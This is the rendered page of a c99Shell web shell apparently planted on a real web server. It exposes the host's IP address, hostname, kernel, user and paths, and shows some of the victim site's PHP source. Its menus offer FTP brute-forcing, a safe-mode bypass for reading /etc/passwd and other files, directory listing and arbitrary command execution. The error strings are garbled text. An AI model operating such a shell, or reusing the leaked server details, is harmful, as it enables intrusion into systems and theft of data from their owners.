110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis2222/ums/ drwxr-xr-x Free 52.61 GB of 127.8 GB (41.16%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/mis2222/ums/ drwxr-xr-x
Free 52.61 GB of 127.8 GB (41.16%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?PHP
                    function update_file ($fpath, $defaultval)
                    {
                    //include_once("../class/clsConnection.php");
                    //    include_once("../class/clsDB.php");
                        $retval = false;
                        if (file_exists($fpath))
                            unlink($fpath);
                        if (($handle = fopen($fpath, "wb"))) {
                            if (fwrite($handle, $defaultval) === FALSE) {
                                if ($handle)
                                    fclose($handle);
                            } else {
                                fclose($handle);
                                $retval = true;
                            }
                        }
                        return $retval;
                    }
                    
                    function folder_writable ( )
                    {
                    //include_once("../class/clsConnection.php");
                    //    include_once("../class/clsDB.php");                    
                    $retval = false;
                        $file_name = "testwrite_" . time() . ".txt";
                        if (($handle = fopen($file_name, "wb"))) {
                            $retval = true;
                            fclose($handle);
                            unlink($file_name);
                        }
                        return $retval;
                    }
                    
                    
                    $save_file = 'lib/nusoap/globalversion.php';
                    $server_path="http://".$server_path."/mis/version/admin/send.php";
                    $new_path="http://".$new_path."/mis/version/admin/send.php";
                    if($method=="editpath"){
                        $server_path=$new_path;
                    }
                    
                    
                    if (folder_writable()) {
                        $content = implode("", @file($save_file));
                        $pattern = "/(\\\$GLOBALS\[\\\"SERVER_PATH\\\"\]\s\=\s)(\\\")(.*)(\\\")(\;)/";
                        $replaceses = $server_path;
                        if (preg_match($pattern,$content)){
                            //echo "match";
                            $newcontent = preg_replace($pattern, "\${1}\${2}$replaceses\${4}\${5}", $content);
                                if (update_file($save_file, $newcontent) == true) {
                                    if($method=="addpath"){
                                        echo "<meta http-equiv='refresh' content='0; URL=updateFile.php'>";
                                    }else if($method=="editpath"){
                                        ?>
                                        <script language="javascript1.2">    
                                            window.close();
                                            window.opener.location.href="updateFile.php";
                                        </script>
                                        <?
                                    }
                                }else{
                                    echo "<div align=\"center\">дБиКТБТГ¶бЎйдўЄЧиНа¤ГЧиН§дґй</div>";
                                    exit;
                                }
                                
                        }else{
                        //not match
                            echo "<div align=\"center\">дБиКТБТГ¶бЎйдўЄЧиНа¤ГЧиН§дґй</div>";
                            exit;
                        }
                    } else {
                        echo "<div align=\"center\">".getcwd() . " cannot writable!</div>";
                        exit;
                    }        

?>

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: